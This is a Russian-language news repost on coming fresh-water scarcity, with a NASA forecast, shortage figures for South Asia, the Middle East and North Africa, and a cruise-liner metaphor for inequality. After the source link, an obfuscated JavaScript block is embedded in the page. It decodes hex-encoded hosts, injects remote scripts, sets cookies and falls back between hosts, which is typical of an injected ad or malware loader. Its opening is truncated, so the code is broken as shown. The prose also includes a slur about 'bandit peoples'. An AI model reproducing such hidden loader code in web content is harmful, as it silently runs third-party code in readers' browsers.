Водный ресурс станет таким же ценным, как металлы и углеводороды
Если представить себе планету Земля в виде огромного космического лайнера, совершающий бесчисленные круизы вокруг Солнца, то окажется, что его пассажиры находятся в неравных условиях. Одни, избранные занимают каюты люкс, для них жизнь - вечный праздник. Другие живут поскромнее, занимая каюты среднего класса.
А третьим вообще не позавидуешь: ютятся в трюмных душных помещениях, недоедают, в общем - пассажиры третьего сорта, живущие по остаточному принципу. Есть ещё категория люмпен-пассажиров, которых никто не любит. "Чистая" публика не желает их видеть на палубах, а строгая полиция следит, чтобы эти оборванцы своим убожеством не оскорбляли изысканные чувства благородной публики.
Люди на Земле всегда воевали за земные блага и территории, а иные, отпетые бандиты-народы, и за человеческий ресурс для продажи людей в рабство. А эти блага распределены на планете неравномерно. В настоящее время климат Земли меняется так, что засушливые районы становятся ещё суше, а влажные - ещё более влажными.
В NASA предсказали человечеству новую глобальную катастрофу, вызванную водным дисбалансом планетарных масштабов. Вскоре водный ресурс станет таким же ценным, как металлы и углеводороды. Слава Богу, Россия оказалась самой богатой страной в мире, в том числе и по запасам пресной воды.
Но самые густонаселенные и, одновременно, бедные регионы: Индия, Пакистан, Ближний Восток и Северная Африка страдают от недостатка пресной воды. Ситуация усугубляется тем, что там крайне мало альтернатив подземным источникам воды.
Недавние исследования показали, что 4 миллиарда людей живут с острой нехваткой воды в течение одного месяца каждый год, а 1,5 миллиарда живут в таких условиях все время. Чистая вода может стать предметом обострения территориальных споров и причиной локальных вооруженных конфликтов.

По материалам http://utro.ru/articles/2016/02/24/1272055.shtml?utm_source=newsmail&utm_medium=news&utm_campaign=news_mail1
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии